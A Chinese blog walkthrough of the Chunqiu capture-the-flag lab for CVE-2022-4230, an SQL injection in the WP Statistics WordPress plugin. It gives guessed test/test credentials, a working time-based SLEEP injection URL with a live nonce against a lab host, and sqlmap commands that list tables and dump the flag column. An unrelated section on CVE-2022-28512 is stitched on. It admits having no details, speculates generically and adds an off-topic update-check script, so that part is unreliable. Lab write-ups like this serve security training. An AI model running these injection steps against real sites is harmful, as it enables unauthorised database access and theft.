春秋云镜 CVE-2022-4230

靶标介绍:

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。

开启靶场:

开始实验:

1、使用后台扫描工具扫描靶场链接

2、打开第一个/readme.html,找到后台登录页面

3、点击login.page,使用admin登录,显示错误,用户名未在本站点注册。最后发现下面有个“返回到test”,应该是有“test”用户名,经过尝试得到用户名和密码都为“test”

4、使用test登录,登录成功。

5、参考wpscan网站的WordPress 插件漏洞验证

https://wpscan.com/vulnerability/a0e40cfd-b217-481c-8fc4-027a0a023312/

Log in as a user allowed to View WP Statistic and get a nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s:

http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

翻译:

以允许查看WP统计信息的用户身份登录,并通过获取随机数https://example.com/wp-admin/admin-ajax.php?action=rest-nonce,并在下面的URL中使用它,该URL将延迟5s:

6、必须先登录后才能获取随机数

http://eci-2ze8z8a5rz3fc378zp6e.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

7、使用随机数测试延迟,替换wpnonce=NONCE为上面获取的随机数wpnonce=00bb70a358

http://eci-2ze8z8a5rz3fc378zp6e.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=00bb70a358&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

发现延迟5秒后显示如下图,存在sql注入。

8、使用Burp抓包,抓包时候要删除掉“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR
”,只使用下面地址

http://eci-2ze8z8a5rz3fc378zp6e.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=00bb70a358&name=words&search_engine=aaa

9、把get内容保存为55.txt

10、使用sqlmap注入测试,查找当前数据库。

sqlmap.py -r 55.txt --batch --current-db

11、查找表

sqlmap.py -r 55.txt --batch -D wordpress --tables

12、查找字段

sqlmap.py -r 55.txt --batch -D wordpress -T flag --columns

13、获取字段值,得到flag

sqlmap.py -r 55.txt  -D wordpress -T flag -C flag --dump

### 关于春秋 CVE-2022-28512 的分析 目前,在提供的引用资料中并未提及有关 **CVE-2022-28512** 的具体细节[^1][^2][^3][^4]。然而,基于常见的漏洞命名规则以及以往类似案例的经验,可以推测该编号可能对应某一特定版本中的安全缺陷。 #### 可能的影响范围 通常情况下,带有此类编号的安全问题主要涉及以下几个方面: - 应用程序逻辑错误可能导致权限提升或数据泄露。 - 配置不当引发未授权访问风险。 - 输入验证不足造成注入攻击隐患。 对于具体的 **影响范围** ,如果此漏洞存在于某个软件产品里,则受影响的对象应包括运行相应版本的所有实例;同时还要考虑是否存在连锁反应——即一个初始的小型弱点是否会被恶意行为者利用来触发更严重的后果。 #### 建议采取的措施 尽管缺乏针对 **CVE-2022-28512** 的确切描述,但仍可遵循通用的最佳实践来进行防护: 1. 更新至最新稳定版:厂商往往会迅速发布补丁解决已知威胁; 2. 实施最小化原则:仅授予必要的操作权限给用户账户; 3. 定期审查日志记录:及时发现异常活动迹象以便快速响应处理潜在入侵事件。 以下是实现上述部分建议的一个简单Python脚本示例用于检查系统更新状态: ```python import subprocess def check_updates(): try: result = subprocess.run(['apt', 'list', '--upgradable'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) if "Listing..." not in result.stdout and len(result.stdout.strip()) > 0 : print("There are available updates:") print(result.stdout) else: print("Your system is up to date.") except Exception as e: print(f"An error occurred while checking for updates: {e}") check_updates() ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QYpiying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值